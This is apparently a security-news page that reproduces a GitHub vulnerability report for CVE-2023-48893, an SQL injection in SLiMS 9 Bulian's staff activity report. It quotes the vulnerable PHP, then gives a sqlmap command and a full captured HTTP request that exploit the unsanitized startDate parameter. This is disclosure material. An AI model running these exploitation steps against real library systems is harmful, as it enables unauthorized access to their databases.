Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-48893: Vuln0wned Report: SQL Injection in staff_act.php · Issue #209 · slims/slims9_bulian

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/staff_act.php.

CVE
Open in Source
#sql#web#windows#php#firefox

The Bug

A SQL Injection exists in admin/modules/reporting/customs/staff_act.php at the code below

// create datagrid
$reportgrid = new report\_datagrid();
$reportgrid\->setSQLColumn('u.realname AS \\''.\_\_('Real Name').'\\'',
    'u.username AS \\''.\_\_('Login Username').'\\'',
    'u.user\_id AS \\''.\_\_('Bibliography Data Entry').'\\'',
    'u.user\_id AS \\''.\_\_('Item Data Entry').'\\'',
    'u.user\_id AS \\''.\_\_('Member Data Entry').'\\'',
    'u.user\_id AS \\''.\_\_('Loans').'\\'',
    'u.user\_id AS \\''.\_\_('Returns').'\\'',
    'u.user\_id AS \\''.\_\_('Extends').'\\'');
$reportgrid\->setSQLorder('realname ASC');

// is there any search
$criteria = 'user\_id IS NOT NULL ';
$reportgrid\->setSQLCriteria($criteria);

$start\_date = '2000-01-01';
if (isset($\_GET\['startDate'\])) {
    $start\_date = $\_GET\['startDate'\]; // unsanitized input 1
}
$until\_date = date('Y-m-d');
if (isset($\_GET\['untilDate'\])) {
    $until\_date = $\_GET\['untilDate'\]; // unsanitized input 2
}

To Reproduce
Steps to reproduce the behavior:

  1. Login as admin or user that has access to Staff Activity Reporting

  2. Make sure the burp is on to capture the request as below

  3. Save the request into a file (example.req)

  4. Run the test with sqlmap with the command

    sqlmap command:
sqlmap -r example.req --level 5 --risk 3 -p startDate --random-agent --dbms=mysql --current-user

  5. It’s in

example.req

GET /slims9_bulian-9.6.1/admin/modules/reporting/customs/staff_act.php?startDate=2000-01-01&untilDate=2023-08-2&applyFilter=Apply+Filter&reportView=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=reporting
Cookie: SenayanAdmin=68n7ojemg853g6ipos463oo2o2; admin_logged_in=1; SenayanMember=nva8k0bovrr32qckn46cs9u46h
Upgrade-Insecure-Requests: 1

Screenshots

proof-of-concept current user

Versions

  • OS: Windows
  • Browser: Firefox | 116.0.3 (64-bit)
  • Slims Version: slims9_bulian-9.6.1

Notes

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE